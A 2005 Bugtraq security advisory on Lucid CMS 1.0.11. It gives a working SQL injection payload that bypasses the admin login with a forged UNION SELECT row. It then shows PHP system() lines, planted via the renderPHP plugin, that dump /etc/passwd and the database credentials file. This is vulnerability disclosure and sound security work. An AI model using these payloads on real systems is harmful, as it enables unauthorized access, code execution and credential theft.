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Message-ID: <20050929205124.8897.qmail@securityfocus.com>
Date: 29 Sep 2005 20:51:24 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution
site: http://lucidcms.net/
lucidCMS is a simple and flexible content management system for the individual or
organization that wishes to manage a collection of web pages without the overhead
and complexity of other available "community" CMS options.
1) if magic quotes off -> SQL Injection:
you can login as admin typing in login form:
login: 'UNION(SELECT'1','admin','admin','FAKE@...mail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing] ^
this is the hash of...nothing
the result of md5('');
note:"login" without spaces
the login query become:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE@...mail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'
now new admin can edit template and insert evil javascript code, see the phpinfo(), manage users/groups,
activate/disable plugins, you can activate renderPHP plugin, add the following line at the end of
the main stylesheet:
<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>
to see /etc/passwd file
<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>
to see database username/password, the database name and table prefix... now you have the full control
of the database
site: http://altervista.org
mail: retrogod@...ceposta.it
original advisory: http://rgod.altervista.org/lucidcms1011.html
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